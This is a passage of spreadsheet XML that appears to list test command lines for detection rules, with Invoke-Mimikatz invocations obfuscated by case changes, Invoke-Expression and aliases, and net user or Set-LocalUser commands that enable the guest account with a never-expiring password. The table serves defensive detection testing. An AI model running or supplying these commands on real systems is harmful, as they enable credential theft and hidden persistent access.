      </c>
    </row>
    <row r="2997" ht="15.75" customHeight="1" s="42">
      <c r="A2997" s="44" t="n"/>
      <c r="B2997" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2997" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2997" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2997" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2997" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2997" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2997" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I299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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2997" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2998" ht="15.75" customHeight="1" s="42">
      <c r="A2998" s="44" t="n"/>
      <c r="B2998" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2998" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2998" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2998" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2998" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2998" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2998" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I299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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2998" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2999" ht="15.75" customHeight="1" s="42">
      <c r="A2999" s="44" t="n"/>
      <c r="B2999" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2999" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2999" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2999" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2999" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2999" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2999" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I299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2999" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2999" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3000" ht="15.75" customHeight="1" s="42">
      <c r="A3000" s="44" t="n"/>
      <c r="B3000" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3000" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3000" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3000" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3000" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3000" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3001" ht="15.75" customHeight="1" s="42">
      <c r="A3001" s="44" t="n"/>
      <c r="B3001" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3001" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3001" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3001" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3001" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3001" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3002" ht="15.75" customHeight="1" s="42">
      <c r="A3002" s="44" t="n"/>
      <c r="B3002" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3002" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3002" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3002" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3002" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3002" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3002" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3002" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3003" ht="15.75" customHeight="1" s="42">
      <c r="A3003" s="44" t="n"/>
      <c r="B3003" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3003" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3003" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3003" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3003" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3003" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3003" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3003" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3004" ht="15.75" customHeight="1" s="42">
      <c r="A3004" s="44" t="n"/>
      <c r="B3004" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3004" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3004" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3004" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3004" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3004" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3004" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3004" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3005" ht="15.75" customHeight="1" s="42">
      <c r="A3005" s="44" t="n"/>
      <c r="B3005" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3005" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3005" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3005" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3005" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3005" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3005" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3005" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3006" ht="15.75" customHeight="1" s="42">
      <c r="A3006" s="44" t="n"/>
      <c r="B3006" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3006" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3006" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3006" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3006" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3006" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3006" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3006" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3007" ht="15.75" customHeight="1" s="42">
      <c r="A3007" s="44" t="n"/>
      <c r="B3007" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3007" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3007" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3007" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3007" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3007" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3007" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3007" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3008" ht="15.75" customHeight="1" s="42">
      <c r="A3008" s="44" t="n"/>
      <c r="B3008" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3008" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3008" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3008" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3008" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3008" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3008" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3008" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3009" ht="15.75" customHeight="1" s="42">
      <c r="A3009" s="44" t="n"/>
      <c r="B3009" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3009" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3009" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3009" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3009" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3009" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3009" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300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09" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3009" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3010" ht="15.75" customHeight="1" s="42">
      <c r="A3010" s="44" t="n"/>
      <c r="B3010" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3010" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3010" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3010" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3010" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3010" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3010" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I301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10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3010" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3011" ht="15.75" customHeight="1" s="42">
      <c r="A3011" s="44" t="n"/>
      <c r="B3011" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3011" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3011" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3011" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3011" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3011" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3011" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I301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011" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3011" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3012" ht="15.75" customHeight="1" s="42">
      <c r="A3012" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3012" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3012" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3012" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3012" s="44" t="inlineStr">
        <is>
          <t>net user guest /active:yes /expires:never /passwordchg:no</t>
        </is>
      </c>
      <c r="F3012" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3012" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3012" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3012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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3012" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3013" ht="15.75" customHeight="1" s="42">
      <c r="A3013" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3013" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3013" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3013" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3013" s="44" t="inlineStr">
        <is>
          <t>net user guest /active:yes /eXpIrEs:neVEr /pAssworDchG:nO</t>
        </is>
      </c>
      <c r="F3013" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3013" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3013" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3013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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3013" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3014" ht="15.75" customHeight="1" s="42">
      <c r="A3014" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3014" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3014" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3014" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3014" s="44" t="inlineStr">
        <is>
          <t>net user guest /ActIve:yEs /expires:never /PaSSWOrDcHG:no</t>
        </is>
      </c>
      <c r="F3014" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3014" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3014" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3014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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3014" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3015" ht="15.75" customHeight="1" s="42">
      <c r="A3015" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3015" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3015" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3015" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3015" s="44" t="inlineStr">
        <is>
          <t>net user guest -"active:yes" /expires:never /passwordchg:no</t>
        </is>
      </c>
      <c r="F3015" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3015" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3015" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3015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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3015" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3016" ht="15.75" customHeight="1" s="42">
      <c r="A3016" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3016" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3016" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3016" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3016" s="44" t="inlineStr">
        <is>
          <t>net user guest /"active:yes" /expires:never /"passwordchg:no"</t>
        </is>
      </c>
      <c r="F3016" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3016" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3016" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3016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3016" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3016" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3017" ht="15.75" customHeight="1" s="42">
      <c r="A3017" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3017" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3017" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3017" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3017" s="44" t="inlineStr">
        <is>
          <t>net user guest -"active:yes" /EXPIReS:NEVer /passwordchg:no</t>
        </is>
      </c>
      <c r="F3017" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3017" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3017" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3017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3017" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3017" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3018" ht="15.75" customHeight="1" s="42">
      <c r="A3018" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3018" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3018" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3018" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3018" s="44" t="inlineStr">
        <is>
          <t>net user guest /active:yes -"expires:never" /passwordchg:no</t>
        </is>
      </c>
      <c r="F3018" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3018" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3018" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3018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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3018" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3019" ht="15.75" customHeight="1" s="42">
      <c r="A3019" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3019" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3019" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3019" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3019" s="44" t="inlineStr">
        <is>
          <t>net user guest /aCTIve:yEs /EXPIrES:NeVEr -"passwordchg:no"</t>
        </is>
      </c>
      <c r="F3019" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3019" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3019" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3019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19" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3019" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3020" ht="15.75" customHeight="1" s="42">
      <c r="A3020" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3020" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3020" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3020" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3020" s="44" t="inlineStr">
        <is>
          <t>net user guest /"active:yes" -"expires:never" -"passwordchg:no"</t>
        </is>
      </c>
      <c r="F3020" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3020" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3020" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3020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3020" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3020" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3021" ht="15.75" customHeight="1" s="42">
      <c r="A3021" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3021" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3021" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3021" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3021" s="44" t="inlineStr">
        <is>
          <t>net user guest /active:Yes -"expires:never" /passwordchg:no</t>
        </is>
      </c>
      <c r="F3021" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3021" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3021" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3021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3021" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3021" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3022" ht="15.75" customHeight="1" s="42">
      <c r="A3022" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3022" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3022" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3022" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3022" s="44" t="inlineStr">
        <is>
          <t>net user guest /aCtIve:yeS /expires:never /PASSworDChg:No</t>
        </is>
      </c>
      <c r="F3022" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3022" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3022" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3022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3022" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3022" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3023" ht="15.75" customHeight="1" s="42">
      <c r="A3023" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3023" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3023" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3023" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3023" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F3023" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3023" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3023" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3023" s="44" t="n"/>
      <c r="J3023" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3023" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3024" ht="15.75" customHeight="1" s="42">
      <c r="A3024" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3024" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3024" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3024" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3024" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F3024" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3024" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3024" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3024" s="44" t="n"/>
      <c r="J3024" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3024" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3025" ht="15.75" customHeight="1" s="42">
      <c r="A3025" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3025" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3025" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3025" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3025" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F3025" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3025" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3025" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3025" s="44" t="n"/>
      <c r="J3025" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3025" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3026" ht="15.75" customHeight="1" s="42">
      <c r="A3026" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3026" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3026" s="44" t="inlineStr">
        <is>
